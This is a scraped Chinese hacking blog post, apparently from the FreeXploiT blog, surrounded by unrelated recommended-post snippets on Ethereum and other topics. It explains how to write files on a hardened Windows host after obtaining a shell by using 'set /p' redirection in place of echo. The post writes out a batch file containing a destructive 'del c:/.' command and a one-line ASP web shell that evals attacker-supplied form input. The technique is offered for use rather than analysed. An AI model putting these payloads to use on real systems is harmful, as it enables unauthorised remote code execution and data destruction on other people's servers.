假如对方是个BT(ALLyeSNO)

最新推荐文章于 2022-06-14 22:18:40 发布
最新推荐文章于 2022-06-14 22:18:40 发布
阅读量1.2k 收藏
点赞数
分类专栏: 原创文章 Bat Man 文章标签: bt javascript web服务 server shell c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/freexploit/article/details/138294
版权
博客介绍了主机安全策略设置,禁止本地主机连接对方端口,允许他人连接自身80端口,去除部分服务,仅提供web服务。还探讨了在获得主机shell后上传文件的办法,涉及利用set命令及JavaScript代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?

呵呵 改内核去掉了echo?

别怕 我们还有set 嘛

set/p allyesno=del c:/.>allyesno.bat

如果遇到转义字符就是^了 嘎嘎。。。

set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
2020-09-08
weixin_41576919的博客
09-08 1111
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 @[TOC](2020-09-08) 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 #1 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 #2 二、使用步骤 1.引入库 代..
以太坊小知识(五)——difficulty、totalDifficulty、cumulativeGasUsed、gasUsed
KeenCryp的博客
01-11 2268
difficulty &amp; totalDifficulty eth.getBlock(22) 输出: { difficulty: 17247064057, extraData: "0x476574682f6b6c6f737572652f76312e302e302d66633739643332642f6c696e ...
以太坊Ethereum区块中的Merkle trie:state,transaction,receipt
05-03
NULL 博文链接:https://lobin.iteye.com/blog/2323163
What is and how to calculate 'cumulative gas used'?
harrietliu的专栏
07-13 1263
First of all, let's understand what is the cumulative gas used. cumulativeGasUsed: Number - The total amount of gas used when this transaction was executed in the block. As suggested by Java
用镜像搭建一个新以太坊节点并部署合约(演示)
DDFFR的博客
08-09 3874
docker run -it –name node6 daocloud.io/ubuntu/node cd privategeth geth –datadir ./data/00 init genesis.json geth –identity “haha” –datadir ./data/00 –networkid 12345 –rpcapi “db,eth,net,web3” –p
MD5加强验证 挑战王小云破解 【 ALLyeSNO
FreeXploiT
05-30 3958
Author : allyesnoTeam   : freexploitDate     : 2006-05-30做梦想到了一个加强md5验证的方法 醒来了赶紧测试一下地球人都知道MD5 被王小云破了!!!破了!!!破了!!!破了!!!破~~(shut up)其实不是破了而是用他们的算法,在数个小时内就可以找到MD5碰撞。就是你用一台IBM P690数小时内能创造出两个MD5相同 内容
bat版鸡鸡管理器 【ALLyeSNO
FreeXploiT
05-07 2464
Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-8仿照kevin1986的vb版肉肉管理器的bat版鸡鸡管理器kevin这个工具蛮好玩的,其中直接调用了mstsc文件引起了我的兴趣,采用的方式可以有以下几种1。vb有现成的终端连接控件,直接添加使用2。捕获mstsc的窗口再从mdb读取信息添加3。存在命令行的发送形式,以此调用如果要写bat
CMD下修改注册表 完全攻略(FreeXploiT搜集 整理 热荐)
FreeXploiT
11-26 2828
ALLyeSNO注:先来段精彩的【 本文未包含zzzevazzz 写的do all in cmd 里面使用inf 修改注册表的 方法 】regedit虽是gui下使用的东东 但其实是有未公开的参数的 可以在cmd下使用regedit的运行参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filenam
用批处理实现文本文件中指定字符串的替换 zz
FreeXploiT
06-17 1万+
主题 用批处理实现文本文件中指定字符串的替换 « 上一主题 | 下一主题 »uglyfrog 发表于:2005-03-02 02:50 回复发帖: 249积分: 0注册: 2001-12-30其实批处理也可以干很多事的,下面的批处理文件实现了对指定目录下的特定文件类型中的字符串进行替换的功能。虽然在unix或linux系统写一条语句就能实现,但在windows下用批处理也总比编一段程序方便些吧。引
以太坊中GetTransactionReceipt 与 GetTransactionByHash区别
09-05 5230
1:GetTransactionReceipt 返回的gas是真实交易消耗的 blocknumber不为空   GetTransactionByHash返回的gas是传过去的值 blocknumber有可能为空   2: cumulativeGasUsed 表示该交易所在块中的所有已被打包的交易中的gas的总和。  ...
以太坊开发文档09 - javascriptApi
Lee的程序空间
12-14 1万+
Web3 JavaScriptÐappAPI 为了让您的应用程序能够在以太坊上工作,您可以使用web3.js库web3提供的对象。在底层,它通过RPC调用与本地节点通信。web3.js与任何暴露RPC层的以太坊节点一起工作。 web3包含eth对象 - web3.eth(专门用于以太坊区块链交互)和shh对象 - web3.shh(用于Whisper交互)。随着时间的推移,我们将介绍其他web
以太坊bloom和logs及代码解析
cz911005的博客
06-14 4625
以太坊 bloom logs getLogs eth_getLogs
以太坊的getTransactionReceipt
Harry Wong的博客
01-06 1545
摘要以太坊的getTransactionReceipt得到logs,里面有几个log,说明合约内抛出了几个事件,用对应事件解析即可。 getTransactionReceipt得到logs,里面有3个log,说明合约内抛出了3个事件,用对应事件解析即可。 ...
开发以太坊遇到的几个问题
changliangwl的专栏
03-02 3132
1.数据同步(根据帐号查询历史交易信息) https://ethereum.stackexchange.com/questions/2531/common-useful-javascript-snippets-for-geth/3478#3478   function getTransactionsByAccount(myaccount, startBlockNumber, endBloc...
谈谈区块链:以太坊的UTXO
well_2000_82的博客
02-16 3151
本来并没有计划写这篇文章,只是这两天微信里有一篇文章传播的比较厉害,叫:《其实并没有什么比特币,只有UTXO》。其中有这么一句话:HyperLedger 和Ethereum 一开始并没有采用 UTXO,现在前者已经切换回 UTXO,后者打算增加这个选项。很多朋友过来问我有没有这么回事,所以专门写一篇文章来阐述我的观点。这篇文章给大家造成很大的困扰,是因为大家都知道以太坊和Hyperledger当前...
动手编写一个以太坊智能合约
热门推荐
区块链大本营
09-14 2万+
一个以太坊节点提供一个RPC界面。这个界面给Ðapp(去中心化应用)访问以太坊区块链的权限和节点提供的功能,比如编译智能合约代码,它用JSON-RPC 2.0规范(不支持提醒和命名的参数) 的子集作为序列化协议,在HTTP和IPC (linux/OSX上的unix域接口,在Windows上叫pipe’s)上可用。
最强以太坊源码解析-02-以太坊架构图
人生有梦不怕迟
12-16 1490
今天在网上看到一副描述以太坊框架的图示,拿过来分享一下: 这张图很犀利,建议诸位去按照这个图原封不动的画一遍,相信会有很多收获!
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8750
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8594
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8365
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值